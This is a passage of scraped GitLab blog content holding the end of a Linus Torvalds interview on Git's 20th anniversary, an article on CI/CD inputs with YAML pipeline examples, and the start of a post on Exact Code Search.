I absolutely refused to deal with it for the kernel, even though a few subsystems (notably the networking side) were actually using CVS to track their code back in the '90s.\n\nAnyway, back then I lived in the Bay Area, and Larry McVoy, who I knew from other projects (mainly [lmbench](https://www.usenix.org/legacy/publications/library/proceedings/sd96/full_papers/mcvoy.pdf)), had started BitMover, which had a new version control model called BitKeeper, or BK, for short.\n\nBK wasn't open source, but Larry liked open source projects and really felt that the lack of version control was holding the kernel back. He wasn't wrong, but the traditional source code managers (SCMs) really didn't work for me at all. Larry spent some time showing me and David Miller (networking maintainer and existing CVS user) what BitKeeper could do.\n\nBK wasn't perfect, and it was based on Source Code Control System (SCCS) like so many other traditional SCMs were, and thus had the same broken \"history per file\" model that everybody else had, and that causes huge and fundamental issues with file renaming and deletion.\n\nBut BK also wasn't just that \"lipstick\" thing. It may have used SCCS at a low level, but on a higher level it fixed some really fundamental things, and did proper distributed development, and had a real global – not per-file – history that made merging code from different trees actually work.\n\nWith CVS, creating branches and merging them was something you had to plan and discuss with people, and were major events. With BK, every repository was a branch. We take that for granted now, and Git obviously took it much further by having many branches *per* repository, but even the much more limited BK model was really a big deal at the time.\n\nAgain, BK wasn't perfect. 
As mentioned, it did do per-file history, which really is a big fundamental problem that makes renaming and file merging simply not work reliably, and inevitably causes chaos and pain (for CVS people, think Attic, shudder). And it had some scalability issues, too, but those took a while to become more than a bit problematic.\n\nBut the biggest problem with BK was the licensing, and while over the years (we used BK from 2002 to 2005) a lot of kernel maintainers did end up switching over to it, it was always a bit of a friction point. And that friction came to a head in late 2004, and the use of BK for the kernel basically became untenable a few months later.\n\nI was in the situation that for three years I'd finally used source control that worked, and it really had solved a lot of problems. There was no way I was going back to the days before source control, but in the years we'd been using BK, nothing better had really come out of the open source community.\n\nSure, people knew that CVS and SVN didn't work well, and there were projects that tried alternate approaches, but some of those approaches were even worse (basically amounting to \"fancy patch tracking\"), or had some good ideas but in the process making up some entirely new horrible design mistakes ([Monotone](https://www.monotone.ca/)).\n\nSo, I looked around for a while, and decided that I didn't have any options – I had to write my own.\n\nNow, technically, it actually did take only a few days to make the first version of Git, and hey, it's all there in the Git commit history. It's easy enough to see how it goes from pretty much zero to being usable enough that I started applying patches from others a week later (and being actively used for the kernel a few days after that).\n\nBut that ignores the fact that I had been *thinking* about the problem for a while by then. Writing code is easy. Getting a good design is what matters. 
So there was a fair amount of background to those few days that is pretty important, and that part doesn't show up in the history.\n\nAnd hey, that first version was very, very rough, and didn't do a lot that was to come later. But you can definitely already see much of the core design in those first few days.\n\n**Can you give us a short recount of the first days and weeks of how the Git project was started?**\n\nI had basically decided that I will stop kernel development until I had an alternative that worked for me. The main goals were to be distributed and high performance, and be something you could absolutely rely on to catch any corruption.\n\nBut I really do want to stress that I wasn't interested in SCMs, per se. I was interested in the end result, not in the process. So Git was never like the kernel for me: I do Linux because I think kernels are interesting - I did Git because I had to.\n\nWhich then directly segues into your next question.\n\n**You handed over the maintainership of Git to Junio Hamano after a couple of months, and Junio is still the maintainer. Why did you hand over maintainership and what made you pick Junio?**\n\nHanding over maintainership was not a hard choice. It was very much: \"The moment somebody else comes along that I can trust to keep it going, I'll go back to doing just the kernel.\"\n\nWhich is not to say that I just threw things over the wall and prayed for the best. I ended up maintaining Git for something like four months because I felt I needed to find somebody who would stick around, and had that hard-to-explain quality of \"GoodTaste\"(TM).\n\nJunio had been one of the very early people involved (he literally showed up the first week of development), but it's not like I just said, \"Tag, you're it.\"  It takes a while to see who sticks around, and who writes code and makes decisions that make sense.\n\nAnd I think Junio has been exemplary. 
I get much too much credit for the few months I spent on Git - particularly in light of the 20th anniversary. I'll take credit for getting the core design right, and getting the project started, but it really is Junio who has led the project (not to belittle the hundreds of other people involved, but still).\n\n**The initial version of the Mercurial version control system was released only 12 days after the initial version of Git, on April 19, 2005. Many people claim that Mercurial's user experience was superior over Git's, but nowadays Git is significantly more popular. Why do you think that Git has won over Mercurial?**\n\nOh, a big part of it is obviously just network effects, and SCMs have very strong network effects. It's why CVS survived as long as it did despite its limitations.\n\nSo, the fact that the kernel used Git (and then at some point it got to be very popular in the Ruby on Rails community, and then it took off everywhere).\n\nBut I really do think that the design of Git is superior. The core model is both very simple and very powerful, and I think that made it easier to translate into other environments. JGit was an early example of that, but you obviously have implementations like the MSgit virtual filesystem, etc.\n\nAnd while Git was famously somewhat hard to use early on, I really do think that some of that comes from having done things \"right,\" where people coming from other environments found Git non-intuitive because Git really did a few hard decisions that a traditional SCM person would never have done.\n\n**The Git project has not stood still since you handed maintainership over to Junio, and its community is always busy working on new features. What do you think the most important milestones were after you have left the project?**\n\nThat's really hard for me to say, mainly because I obviously made Git work for me, and so the things *I* use have worked from pretty much Day One. 
Just as an obvious example: Making Git work on Windows was obviously a huge step for other people, but it affected *me* not at all ;)\n\nThere's obviously all the infrastructure within Git itself to make it a lot easier to use, but I think most of the big milestones have all been around people taking the Git infrastructure and building things around it. Those often end up feeding back into Git features, of course, but, at the same time, the milestone is about something external.\n\nTo give an obvious example: All the big Git hosting sites were big milestones. Making Git be distributed was what made those so much easier to do, but the *milestone* was how then the hosting made it so easy for users to use Git for various projects.\n\n**If you had the capacity to work on Git full time again, would there be anything that you would like to implement?**\n\nAbsolutely not. Git did everything I really needed from very early on – my use is actually fairly limited, and I only really care about one project.\n\nAnd I say \"absolutely not\" because I refer you to that earlier answer: I was never really interested in SCMs at all to begin with. I think a large reason for why Git ended up being so different - mostly in good ways - from other SCMs was that I approached it more like I would a distributed journaling filesystem, not really a traditional SCM.\n\n**Is there any feature or design decision in Git that you have come to regret in retrospect?**\n\nDesign decisions? No. I still think the high-level design is just very good, and you can discuss various Git concepts without ever getting into the nitty-gritty complexity of actual implementation.\n\nAnd I think that's important in a project. You need a certain high-level design principle to guide the conceptual direction of a project.\n\nSometimes people take that too far, and think that the high-level design means that the implementation must then slavishly follow some core principle. 
And that's wrong, too – the *implementation* will have lots of nasty corner cases because reality is hard and people want odd things, but there needs to be some kind of top-level design that you can point to and reason about at a high level before you get your hands dirty with the nasty reality.\n\nAnd I think Git has a good balance of that. A very straightforward object store design (call them \"structured Merkle trees\" if you are a CS person, or you might just think of them as a \"content addressable storage\" if you are a filesystem person). That core design is there – but at the same time, it's realistically just a very tiny part of the actual code. Most of the *code* is about all the things you can do with the core design, but that basic clarity of design still gives the project some kind of high-level structure.\n\nIt's the same kind of high-level structure that Unix itself had, whether you said \"everything is a file\" or you were talking about process handling. There are a few \"concepts\" that drive the design, but then 99% of the code is about the ugly harsh details of what you build on top of that to make it all useful in the real world.\n\nI have two mantras in technology: \"If I have seen further, it is by standing on the shoulders of giants\" (Newton) and \"Genius is 1% inspiration and 99% perspiration\" (Edison).\n\nBut talking about the 99% perspiration: While I am very happy with the big design, there are certainly various details that I would have done differently if I were to do Git today.\n\nBut honestly, they aren't that important. What's much more important is all the *good* details that have been done over the last two decades.\n\n**The Linux kernel has started to use Rust as a programming language for some of its subsystems. 
Do you think it makes sense to start using such newer programming languages like this in Git?**\n\nI suspect that when it comes to Git, there's less reason to try to mix languages, which is always somewhat painful.\n\nIn the kernel, the end result is one single kernel binary – even if much of it can be loaded dynamically as modules, it is still linked together into effectively one single binary.\n\nAnd that makes using multiple languages more complex. But, on the other hand, the kernel also has more reason to worry about memory safety and, thus, look at newer languages.\n\nIn Git, if somebody wants to write parts of it in Rust or another language, I suspect it makes much more sense to just go for a separate implementation rather than try to mix languages in one binary.\n\nMuch of the Git core ideas are simple enough that just having parallel implementations of the core likely isn't too painful, and then you can target particular problem spaces where a different language makes more sense.\n\nAnd we've seen that in Git already, of course: That's exactly what JGit is. The use of a different language was due to a different web-based environment where that language choice was much more natural.\n\nI know that there are already Rust implementations of some of the core Git functionality, and I think the situation is similar: I suspect they make more sense in specific situations than in some kind of overall \"let's convert things to Rust\" kind of way.\n\nSo for anybody who is interested in implementing things in Rust, I'd suggest looking for target areas where the advantages of Rust are more obvious. I don't think C has actually been all that problematic in the standard Git source base.\n\n**New version control systems are popping up every couple of years. 
Do you think that Git will stay relevant in the future?**\n\nI already mentioned the network effects in SCMs, and I think that means that to replace Git you have to be not just slightly better, you have to be enormously better. Or so compatible that you effectively are just a new implementation of Git.\n\nAnd I do think the SCM situation has changed – Git doesn't have the kinds of huge gaping fundamental problems that SCMs had before Git. So being \"enormously better\" is fairly hard.\n\nSo, yes, I would expect Git to stay relevant for the foreseeable future, with people working on improvements *around* Git rather than replacements.\n\n*Note: This interview has been edited for length and clarity.*\n\n> Take a [journey with us through Git's 20-year history](https://about.gitlab.com/blog/journey-through-gits-20-year-history/).\n\n## Learn more about Git\n\n- [What's new in Git 2.49.0?](https://about.gitlab.com/blog/whats-new-in-git-2-49-0/)  \n- [What’s new in Git 2.48.0?](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/)  \n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)\n- [Git project](https://git-scm.com/)",[900,983],{"slug":1083,"featured":91,"template":789},"celebrating-gits-20th-anniversary-with-creator-linus-torvalds",{"category":90,"slug":757,"posts":1085},[1086,1100,1111],{"content":1087,"config":1097},{"title":1088,"description":1089,"authors":1090,"heroImage":1092,"date":1093,"body":1094,"category":757,"tags":1095},"GitLab Patch Release: 18.1.2, 18.0.4, 17.11.6","Learn more about this patch release for GitLab Community Edition (CE) and Enterprise Edition (EE).",[1091],"Greg Myers","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749661926/Blog/Hero%20Images/security-patch-blog-image-r2-0506-700x400-fy25_2x.jpg","2025-07-09","This is the post for [GitLab Patch Release: 18.1.2, 18.0.4, 
17.11.6](https://about.gitlab.com/releases/2025/07/09/patch-release-gitlab-18-1-2-released/).",[1096],"patch releases",{"featured":6,"template":789,"externalUrl":1098,"slug":1099},"https://about.gitlab.com/releases/2025/07/09/patch-release-gitlab-18-1-2-released/","gitlab-patch-release-18-1-2-18-0-4-17-11-6",{"content":1101,"config":1109},{"title":1102,"description":1103,"authors":1104,"heroImage":1106,"date":836,"body":1107,"category":757,"tags":1108},"CI/CD inputs: Secure and preferred method to pass parameters to a pipeline","Learn how CI/CD inputs provide type-safe parameter passing with validation, replacing error-prone variables for more reliable pipelines.",[1105],"Dov Hershkovitch","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749658912/Blog/Hero%20Images/blog-image-template-1800x945__20_.png","\nGitLab CI/CD inputs represent the future of pipeline parameter passing. As\na purpose-built feature designed specifically for typed parameters with\nvalidation, clear contracts, and enhanced security, inputs solve the\nfundamental challenges that teams have been working around with variables\nfor years.\n\nWhile CI/CD variables have served as the traditional method for passing parameters to pipelines, they were originally designed for storing configuration settings — not as a sophisticated parameter-passing mechanism for complex workflows. This fundamental mismatch has created reliability issues, security concerns, and maintenance overhead that inputs elegantly eliminate.\n\nThis article demonstrates why CI/CD inputs should be your preferred approach for pipeline parameters. You'll discover how inputs provide type safety, prevent common pipeline failures, eliminate variable collision issues, and create more maintainable automation. 
You'll also see practical examples of inputs in action and how they solve real-world challenges, which we hope will encourage you to transition from variable-based workarounds to input-powered reliability.\n\n## The hidden costs of variable-based parameter passing\n\nThe problems with using variables for parameter passing are numerous and frustrating. \n\n**No type validation**\n\nVariables are strings. There is no type validation, meaning a pipeline expecting a boolean or a number, but accidentally receives a string. This leads to unexpected failures deep into the pipeline execution. In the case of a deployment workflow for example, hours after it was started  a critical production deployment fails because a boolean check in a variable was not passed as expected.\n\n\n**Runtime mutability**\n\nVariables can be modified throughout the pipeline runtime, creating unpredictable behavior when multiple jobs attempt to change the same values. For example, deploy_job_a sets `DEPLOY_ENV=staging`, but deploy_job_b changes the `DEPLOY_ENV` value to `production`. \n\n\n**Security risks**\n\nSecurity concerns arise because variables intended as simple parameters often receive the same access permissions as sensitive secrets. There's no clear contract defining what parameters a pipeline expects, their types, or their default values. A simple `BUILD_TYPE` parameter, that seems innocuous at first glance, suddenly has access to production secrets simply because variables do not inherently distinguish between parameters and sensitive data.\n\n\nPerhaps most problematically, error detection happens too late in the process. A misconfigured variable might not cause a failure until minutes or even hours into a pipeline run, wasting valuable CI/CD resources and developer time. 
Teams have developed elaborate workarounds such as custom validation scripts, extensive documentation, and complex naming conventions just to make variable-based parameter passing somewhat reliable.\n\nMany users have requested local debugging capabilities to test pipeline configurations before deployment. While this seems like an obvious solution, it quickly breaks down in practice. Enterprise CI/CD workflows integrate with dozens of external systems — cloud providers, artifact repositories, security scanners, deployment targets — that simply can't be replicated locally. Even if they could, the complexity would make local testing environments nearly impossible to maintain. This mismatch forced us to reframe the problem entirely. Instead of asking \"How can we test pipelines locally?\" we started asking \"How can we prevent configuration issues caused by variable-based parameter passing before users run a CI/CD automation workflow?\"\n\n## Understanding variable precedence\n\nGitLab's variable system includes multiple [precedence levels](https://docs.gitlab.com/ci/variables/#cicd-variable-precedence) to provide flexibility for different use cases. While this system serves many valid scenarios like allowing administrators to set instance- or group-wide defaults while letting individual projects override them when needed, it can create challenges when building reusable pipeline components.\n\n\nWhen creating components or templates that will be used across different projects and groups, the variable precedence hierarchy can make behavior less predictable. 
For example, a template that works perfectly in one project might behave differently in another due to group- or instance-level variable overrides that aren't visible in a pipeline configuration.\n\n\nWhen including multiple templates, it also can be challenging to track which variables are being set where and how they might interact.\n\n\nIn addition, components authors need to document not just what variables their template uses, but also potential conflicts with variables that might be defined at higher precedence levels.\n\n\n### Variable precedence examples\n\n\n**Main pipeline file (`.gitlab-ci.yml`):**\n\n\n```yaml\n\nvariables:\n  ENVIRONMENT: production  # Top-level default for all jobs\n  DATABASE_URL: prod-db.example.com\n\ninclude:\n  - local: 'templates/test-template.yml'\n  - local: 'templates/deploy-template.yml'\n```\n\n\n**Test template (`templates/test-template.yml`):**\n\n\n```yaml\n\nrun-tests:\n  variables:\n    ENVIRONMENT: test  # Job-level variable overrides the default\n  script:\n    - echo \"Running tests in $ENVIRONMENT environment\"  \n    - echo \"Database URL is $DATABASE_URL\"  # Still inherits prod-db.example.com!\n    - run-integration-tests --env=$ENVIRONMENT --db=$DATABASE_URL\n    `# Issue: Tests run in \"test\" environment but against production database`\n\n```\n\n\n**Deploy template (`templates/deploy-template.yml`):**\n\n\n``` yaml\n\ndeploy-app:\n  script:\n    - echo \"Deploying to $ENVIRONMENT\"  # Uses production (top-level default)\n    - echo \"Database URL is $DATABASE_URL\"  # Uses prod-db.example.com\n    - deploy --target=$ENVIRONMENT --db=$DATABASE_URL\n    # This will deploy to production as intended\n```\n\n**The challenges in this example:**\n\n\n1. Partial inheritance: The test job gets `ENVIRONMENT=test` but still inherits `DATABASE_URL=prod-db.example.com`.  \n\n2. Coordination complexity: Template authors must know what top-level variables exist and might conflict.  \n\n3. 
Override behavior: Job-level variables with the same name override defaults, but this isn't always obvious.  \n\n4. Hidden dependencies: Templates become dependent on the main pipeline's variable names.\n\n\nGitLab recognized these pain points and introduced [CI/CD inputs](https://docs.gitlab.com/ee/ci/inputs/) as a purpose-built solution for passing parameters to pipelines, offering typed parameters with built-in validation that occurs at pipeline creation time rather than during execution.\n\n\n## CI/CD inputs fundamentals\n\n\nInputs provide typed parameters for reusable pipeline configuration with built-in validation at pipeline creation time, designed specifically for defining values when the pipeline runs. They create a clear contract between the pipeline consumer and the configuration, explicitly defining what parameters are expected, their types, and constraints.\n\n\n### Configuration flexibility and scope\n\n\nOne of the advantages of inputs is their configuration-time flexibility. Inputs are evaluated and interpolated during pipeline creation using the interpolation format `$[[ inputs.input-id ]]`, meaning they can be used anywhere in your pipeline configuration — including job names, rules conditions, images, and any other YAML configuration element. This eliminates the long-standing limitation of variable interpolation in certain contexts.\n\n\nOne common use case we've seen is that users define their job names like `test-$[[ inputs.environment ]]-deployment`.\n\n\nWhen using inputs in job names, you can prevent naming conflicts when the same component is included multiple times in a single pipeline. Without this capability, including the same component twice would result in job name collisions, with the second inclusion overwriting the first. 
Input-based job names ensure each inclusion creates uniquely named jobs.\n\n\n**Before inputs:**\n\n\n```yaml\n\ntest-service:\n  variables:\n    SERVICE_NAME: auth-service\n    ENVIRONMENT: staging\n  script:\n    - run-tests-for $SERVICE_NAME in $ENVIRONMENT\n```\n\n\n**With inputs:**\n\n\n```yaml\n\nspec:\n  inputs:\n    environment:\n      type: string\n    service_name:\n      type: string\n\ntest-$[[ inputs.service_name ]]-$[[ inputs.environment ]]:\n  script:\n    - run-tests-for $[[ inputs.service_name ]] in $[[ inputs.environment ]]\n```\n\n\nWhen included multiple times with different inputs, this creates jobs like `test-auth-service-staging`, `test-payment-service-production`, and `test-notification-service-development`. Each job has a unique, meaningful name that clearly indicates its purpose, making pipeline visualization much clearer than having multiple jobs with identical names that would overwrite each other.\n\n\nNow let's go back to the first example in the top of this blog and use inputs, one immediate benefit is that instead of maintaining multiple templates file we can use one reusable template with different input values:\n\n\n```yaml\n\nspec:\n  inputs:\n    environment:\n      type: string\n    database_url:\n      type: string\n    action:\n      type: string\n---\n\n$[[ inputs.action ]]-$[[ inputs.environment ]]:\n  script:\n    - echo \"Running $[[ inputs.action ]] in $[[ inputs.environment ]] environment\"\n    - echo \"Database URL is $[[ inputs.database_url ]]\"\n    - run-$[[ inputs.action ]] --env=$[[ inputs.environment ]] --db=$[[ inputs.database_url ]]\n```\n\n\nAnd in the main `gitlab-ci.yml` file we can include it twice (or more) with different values, making sure we avoid naming collisions\n\n\n```yaml\n\ninclude:\n  - local: 'templates/environment-template.yml'\n    inputs:\n      environment: test\n      database_url: test-db.example.com\n      action: tests\n  - local: 'templates/environment-template.yml'\n    inputs:\n      
environment: production\n      database_url: prod-db.example.com\n      action: deploy\n```\n\n\n**The result:** Instead of maintaining separate YAML files for testing and deployment jobs, you now have a single reusable template that handles both use cases safely. This approach scales to any number of environments or job types — reducing maintenance overhead, eliminating code duplication, and ensuring consistency across your entire pipeline configuration. One template to maintain instead of many, with zero risk of variable collision or configuration drift.\n\n\n### Validation and type safety\n\n\nAnother key difference between variables and inputs lies in validation capabilities. Inputs support different value types, including strings, numbers, booleans, and arrays, with validation occurring immediately when the pipeline is created. If you define an input as a boolean but pass a string, GitLab will reject the pipeline before any jobs execute, saving time and resources.\n\n\nHere is an example of the enormous benefit of type validation.\n\n\n**Without type validation (variables):**\n\n\n```yaml\n\nvariables:\n  ENABLE_TESTS: \"true\"  # Always a string\n  MAX_RETRIES: \"3\"      # Always a string\n\ndeploy_job:\n  script:\n    - if [ \"$ENABLE_TESTS\" = true ]; then  # This fails!\n        echo \"Running tests\"\n      fi\n    - retry_count=$((MAX_RETRIES + 1))      # String concatenation: \"31\"\n\n```\n\n\n**Problem:**  The boolean check fails because “`true`” (string) is not equal to `true`, (boolean).\n\n\n**With type validation (inputs):**\n\n\n```yaml\n\nspec:\n  inputs:\n    enable_tests:\n      type: boolean\n      default: true\n    max_retries:\n      type: number\n      default: 3\n\n      \ndeploy_job:\n  script:\n    - if [ \"$[[ inputs.enable_tests ]]\" = true ]; then  # Works correctly\n        echo \"Running tests\"\n      fi\n    - retry_count=$(($[[ inputs.max_retries ]] + 1))    # Math works: 4\n\n```\n\n\n**Real-world impact for variable type 
validation failure**: A developer or a process triggers a GitLab CI/CD pipeline with `ENABLE_TESTS = yes` instead of `true`. Assuming it takes on average 30 minutes before the deployment job starts, then finally when this job kicks off, 30 minutes or longer into the pipeline run, the deployment script tries to evaluate the boolean and fails.  \n\n\nImagine the impact in terms of time-to-market and, of course. developer time trying to debug why a seemingly basic deploy job failed.\n\n\nWith type inputs, GitLab CI/CD will immediately throw an error and provide an explicit error message regarding the type mismatch.\n\n\n### Security and access control\n\n\nInputs provide enhanced security through controlled parameter passing with explicit contracts that define exactly what values are expected and allowed, creating clear boundaries between parameter passing to the pipeline, In addition. inputs are immutable. Once the pipeline starts, they cannot be modified during execution, providing predictable behavior throughout the pipeline lifecycle and eliminating the security risks that come from runtime variable manipulation.\n\n\n### Scope and lifecycle\n\n\nWhen you define variables using the `variables:` keyword at the top level of your `.gitlab-ci.yml` file, these variables become defaults for all jobs in your entire pipeline. When you include templates, you must consider what variables you've defined globally, as they can interact with the template's expected behavior through GitLab's variable precedence order.\n\n\nInputs are defined in CI configuration files (e.g. components or templates) and assigned values when a pipeline is triggered, allowing you to customize reusable CI configurations. They exist solely for pipeline creation and configuration time, scoped to the CI configuration file where they're defined, and become immutable references once the pipeline begins execution. 
Since each component maintains its own inputs, there is no risk of inputs interfering with other components or templates in your pipeline, eliminating variable collision and override issues that can occur with variable-based approaches.\n\n\n## Working with variables and inputs together\n\n\nWe recognize that teams have extensive investments in their variable-based workflows, and migration to inputs doesn't happen overnight. That's why we've developed capabilities that allow inputs and variables to work seamlessly together, providing a bridge between existing variables and the benefits of inputs while overcoming some key challenges in variable expansion.\n\n\nLet's look at this real-world example.\n\n\n**Variable expansion in rules conditions**\n\n\nA common challenge occurs when using variables that contain other variable references in `rules:if` conditions. GitLab only expands variables one level deep during rule evaluation, which can lead to unexpected behavior:\n\n\n```yaml\n# This doesn't work as expected\n\nvariables:\n  TARGET_ENV:\n    value: \"${CI_COMMIT_REF_SLUG}\"\n\ndeploy-job:\n  rules:\n    - if: '$TARGET_ENV == \"production\"'  # Compares \"${CI_COMMIT_REF_SLUG}\" != \"production\"\n      variables:\n        DEPLOY_MODE: \"blue-green\"\n```\n\n\nThe `expand_vars` function solves this by forcing proper variable expansion in inputs:\n\n```yaml\nspec:\n  inputs:\n    target_environment:\n      description: \"Target deployment environment\"\n      default: \"${CI_COMMIT_REF_SLUG}\"\n---\n\n\ndeploy-job:\n  rules:\n    - if: '\"$[[ inputs.target_environment | expand_vars ]]\" == \"production\"'\n      variables:\n        DEPLOY_MODE: \"blue-green\"\n        APPROVAL_REQUIRED: \"true\"\n    - when: always\n      variables:\n        DEPLOY_MODE: \"rolling\"\n        APPROVAL_REQUIRED: \"false\"\n  script:\n    - echo \"Target: $[[ inputs.target_environment | expand_vars ]]\"\n    - echo \"Deploy mode: ${DEPLOY_MODE}\"\n```\n\n\n### Why this 
matters\n\n\nWithout `expand_vars`, rule conditions evaluate against the literal variable reference (like `\"${CI_COMMIT_REF_SLUG}\"`) rather than the expanded value (like `\"production\"`). This leads to rules that never match when you expect them to, breaking conditional pipeline logic.\n\n\n**Important notes about expand_vars:**\n\n\n* Only variables that can be used with the include keyword are supported  \n\n* Variables must be unmasked (not marked as protected/masked)  \n\n* Nested variable expansion is not supported  \n\n* Rule conditions using `expand_vars` must be properly quoted: `'\"$[[ inputs.name | expand_vars ]]\" == \"value\"'`\n\n\nThis pattern solves the single-level variable expansion limitation, working for any conditional logic that requires comparing fully resolved variable values.\n\n\n### Function chaining for advanced processing\n\n\nAlong with `expand_vars`, you can use functions like `truncate` to shorten values for compliance with naming restrictions (such as Kubernetes resource names), creating sophisticated parameter processing pipelines while maintaining input safety and predictability.\n\n\n```yaml\n\nspec:  \n  inputs:\n    service_identifier:\n      default: 'service-$CI_PROJECT_NAME-$CI_COMMIT_REF_SLUG'\n---\n\ncreate-resource:\n  script:\n    - resource_name=$[[ inputs.service_identifier | expand_vars | truncate(0,50) ]]\n```\n\n\nThis integration capability allows you to adopt inputs gradually while leveraging your existing variable infrastructure, making the migration path much smoother.\n\n\n### From components only to CI pipelines\n\n\nUp until GitLab 17.11, GitLab users were able to use inputs only in components and templates through the `include:` syntax. 
This limited their use to reusable CI/CD configurations, but didn't address the broader need for dynamic pipeline customization.\n\n\n### Pipeline-wide inputs support\n\n\nStarting with GitLab 17.11, GitLab users can now use inputs to safely modify pipeline behavior across all pipeline execution contexts, replacing the traditional reliance on pipeline variables. This expanded support includes:\n\n\n* Scheduled pipelines: Define inputs with defaults for automated pipeline runs while allowing manual override when needed.  \n\n* Downstream pipelines: Pass structured inputs to child and multi-project pipelines with proper validation and type safety.  \n\n* Manual pipelines: Present users with a clean, validated form interface.\n\n\nThose enhancements, with more to follow, allow teams to modernize their pipelines while maintaining backward compatibility gradually. Once inputs are fully adopted, users can disable pipeline variables to ensures a more secure and predictable CI/CD environment.\n\n\n## Summary\n\n\nThe transition from variables to inputs represents more than just a technical upgrade — it's a shift toward more maintainable, predictable, and secure CI/CD pipelines. While variables continue to serve important purposes for configuration, inputs provide the parameter-passing capabilities that teams have been working around for years.\n\n\nWe understand that variables are deeply embedded in existing workflows, which is why we've built bridges between the two systems. The `expand_vars` function and other input capabilities allow you to adopt inputs gradually while leveraging your existing variable infrastructure.\n\n\nBy starting with new components and templates, then gradually migrating high-impact workflows, you'll quickly see the benefits of clearer contracts, earlier error detection, and more reliable automation that scales across your organization. 
Additionally, moving to inputs creates an excellent foundation for leveraging [GitLab's CI/CD Catalog](https://gitlab.com/explore/catalog), where reusable components with typed interfaces become powerful building blocks for your DevOps workflows but more on that in our next blog post.\n\n\nYour future self and your teammates will thank you for the clarity and reliability that inputs bring to your CI/CD workflows, while still being able to work with the variable systems you've already invested in.\n\n\n## What's next \n\n\nLooking ahead, we're expanding inputs to solve two key challenges: enhancing pipeline triggering with cascading options that [dynamically adjust based on user selections](https://gitlab.com/gitlab-org/gitlab/-/issues/520094), and providing job-level inputs that allow users to [retry individual jobs with different parameter values](https://gitlab.com/groups/gitlab-org/-/epics/17833). We encourage you to follow these discussions, share your feedback, and contribute to shaping these features. 
You can also provide general feedback on CI/CD inputs through our [feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/407556).\n\n## Read more\n\n- [How to include file references in your CI/CD components](https://about.gitlab.com/blog/how-to-include-file-references-in-your-ci-cd-components/)\n- [CI/CD inputs documentation](https://docs.gitlab.com/ci/inputs/)\n- [CI/CD Catalog goes GA: No more building pipelines from scratch](https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/)\n- [GitLab environment variables demystified](https://about.gitlab.com/blog/demystifying-ci-cd-variables/)\n",[109,757,767],{"featured":6,"template":789,"slug":1110},"ci-cd-inputs-secure-and-preferred-method-to-pass-parameters-to-a-pipeline",{"content":1112,"config":1121},{"title":1113,"description":1114,"authors":1115,"heroImage":1117,"date":1118,"body":1119,"category":757,"tags":1120},"Exact Code Search: Find code faster across repositories","Discover how this new GitLab feature can find exact matches, use regex patterns, and see contextual results across terabytes of codebases.",[1116],"Dmitry Gruzd","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675154/Blog/Hero%20Images/blog-image-template-1800x945__8_.png","2025-06-25","**TL;DR:** What if you could find any line of code across 48 TB of repositories in milliseconds? GitLab's new [Exact Code Search](https://docs.gitlab.com/ee/user/search/exact_code_search.html) makes this possible, delivering pinpoint precision, powerful regex support, and contextual multi-line results that transform how teams work with large codebases.\n## Why traditional code search is challenging\n\nAnyone who works with code knows the frustration of searching across repositories. 
Whether you're a developer debugging an issue, a DevOps engineer examining configurations, a security analyst searching for vulnerabilities, a technical writer updating documentation, or a manager reviewing implementation, you know exactly what you need, but traditional search tools often fail you.\n\nThese conventional tools return dozens of false positives, lack the context needed to understand results, and slow to a crawl as codebases grow. The result? Valuable time spent hunting for needles in haystacks instead of building, securing, or improving your software.\n\nGitLab's code search functionality has historically been backed by Elasticsearch or OpenSearch. While these are excellent for searching issues, merge requests, comments, and other data containing natural language, they weren't specifically designed for code. After [evaluating numerous options](https://gitlab.com/groups/gitlab-org/-/epics/7404), we developed a better solution.\n\n## Introducing Exact Code Search: Three game-changing capabilities\n\nEnter GitLab's **[Exact Code Search](https://docs.gitlab.com/ee/user/search/exact_code_search.html)**, currently in beta testing and powered by [Zoekt](https://github.com/sourcegraph/zoekt) (pronounced \"zookt\", Dutch for \"search\"). Zoekt is an open-source code search engine originally created by Google and now maintained by Sourcegraph, specifically designed for fast, accurate code search at scale. We've enhanced it with GitLab-specific integrations, enterprise-scale improvements, and seamless permission system integration.\n\nThis feature revolutionizes how you find and understand code with three key capabilities:\n\n**1. Exact Match mode: Zero false positives**\n\nWhen toggled to **Exact Match mode**, the search engine returns only results that match your query exactly as entered, eliminating false positives. 
This precision is invaluable when:\n\n* Searching for specific error messages\n* Looking for particular function signatures\n* Finding instances of specific variable names\n\n**2. Regular Expression mode: Powerful pattern matching**\n\nFor complex search needs, Regular Expression mode allows you to craft sophisticated search patterns:\n\n* Find functions following specific naming patterns\n* Locate variables matching certain constraints\n* Identify potential security vulnerabilities using pattern matching\n\n**3. Multiple-line matches: See code in context**\n\n![Exact Code Search](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750704179/ttjuilkt3v7gtyywnchx.png)\n\nInstead of seeing just a single line with your matching term, you get the surrounding context that's crucial for understanding the code. This eliminates the need to click through to files for basic comprehension, significantly accelerating your workflow.\n\n## From features to workflows: Real-world use cases and impact\n\nLet's see how these capabilities translate to real productivity gains in everyday development scenarios:\n\n### Debugging: From error message to root cause in seconds\n\nBefore Exact Code Search:\nCopy an error message, search, wade through dozens of partial matches in comments and documentation, click through multiple files, and eventually find the actual code.\n\nWith Exact Code Search:\n\n1. Copy the exact error message\n2. Paste it into Exact Code Search with Exact Match mode\n3. 
